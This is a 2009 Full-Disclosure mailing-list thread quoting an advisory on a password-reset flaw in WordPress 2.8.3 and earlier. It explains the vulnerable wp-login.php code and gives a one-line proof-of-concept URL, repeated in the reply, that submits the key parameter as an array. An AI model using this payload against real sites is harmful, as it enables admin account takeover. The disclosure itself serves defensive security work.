[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password



Hi there,
"What would the "attacker" submit as a query to the server?"

Simply:
/wp-login.php?action=rp&key[]=<http://domain_name.tld/wp-login.php?action=rp&key%5B%5D=>

And the admin passwd would be reseted.

Regards.


2009/8/11 Rafal M. Los <rafal@xxxxxxxxxxxxxxxx>

>  Hi Laurent,
>     Pardon my stupidity... I seem to be missing something tonight.  Can
> you explain a little further for someone who doesn’t have coding (php)
> background?  What would the "attacker" submit as a query to the server?
> What specifically triggers the vulnerabiilty?
> .
>
> Rafal M. Los
> Security & IT Risk Strategist
>
>  - Blog:         http://preachsecurity.blogspot.com
>  - LinkedIn:  http://www.linkedin.com/in/rmlos
>  - Twitter:     http://twitter.com/RafalLos
>
>  *From:* laurent gaffie <laurent.gaffie@xxxxxxxxx>
> *Sent:* Monday, August 10, 2009 9:09 PM
> *To:* full-disclosure@xxxxxxxxxxxxxxxxx
> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
> =============================================
> - Release date: August 10th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium
> =============================================
>
> I. VULNERABILITY
> -------------------------
> WordPress <= 2.8.3 Remote admin reset password
>
> II. BACKGROUND
> -------------------------
> WordPress is a state-of-the-art publishing platform with a focus on
> aesthetics, web standards, and usability.
> WordPress is both free and priceless at the same time.
> More simply, WordPress is what you use when you want to work with your
> blogging software, not fight it.
>
> III. DESCRIPTION
> -------------------------
> The way Wordpress handle a password reset looks like this:
> You submit your email adress or username via this form
> /wp-login.php?action=lostpassword ;
> Wordpress send you a reset confirmation like that via email:
>
> "
> Someone has asked to reset the password for the following site and
> username.
> http://DOMAIN_NAME.TLD/wordpress
> Username: admin
> To reset your password visit the following address, otherwise just ignore
> this email and nothing will happen
>
>
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> "
>
> You click on the link, and then Wordpress reset your admin password, and
> sends you over another email with your new credentials.
>
> Let's see how it works:
>
>
> wp-login.php:
> ...[snip]....
> line 186:
> function reset_password($key) {
>     global $wpdb;
>
>     $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
>     if ( empty( $key ) )
>         return new WP_Error('invalid_key', __('Invalid key'));
>
>     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
> user_activation_key = %s", $key));
>     if ( empty( $user ) )
>         return new WP_Error('invalid_key', __('Invalid key'));
> ...[snip]....
> line 276:
> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> $errors = new WP_Error();
>
> if ( isset($_GET['key']) )
>     $action = 'resetpass';
>
> // validate action so as to default to the login screen
> if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
> 'resetpass', 'rp', 'register', 'login')) && false ===
> has_filter('login_form_' . $action) )
>     $action = 'login';
> ...[snip]....
>
> line 370:
>
> break;
>
> case 'resetpass' :
> case 'rp' :
>     $errors = reset_password($_GET['key']);
>
>     if ( ! is_wp_error($errors) ) {
>         wp_redirect('wp-login.php?checkemail=newpass');
>         exit();
>     }
>
>     wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>     exit();
>
> break;
> ...[snip ]...
>
> You can abuse the password reset function, and bypass the first step and
> then reset the admin password by submiting an array to the $key variable.
>
>
> IV. PROOF OF CONCEPT
> -------------------------
> A web browser is sufficiant to reproduce this Proof of concept:
> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> The password will be reset without any confirmation.
>
> V. BUSINESS IMPACT
> -------------------------
> An attacker could exploit this vulnerability to compromise the admin
> account of any wordpress/wordpress-mu <= 2.8.3
>
> VI. SYSTEMS AFFECTED
> -------------------------
> All
>
> VII. SOLUTION
> -------------------------
> No patch aviable for the moment.
>
> VIII. REFERENCES
> -------------------------
> http://www.wordpress.org
>
> IX. CREDITS
> -------------------------
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> I'd like to shoot some greetz to securityreason.com for them great
> research on PHP, as for this under-estimated vulnerability discovered by
> Maksymilian Arciemowicz :
> http://securityreason.com/achievement_securityalert/38
>
> X. REVISION HISTORY
> -------------------------
> August 10th, 2009: Initial release
>
> XI. LEGAL NOTICES
> -------------------------
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
follow me @twitter ! : http://twitter.com/laurentgaffie
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/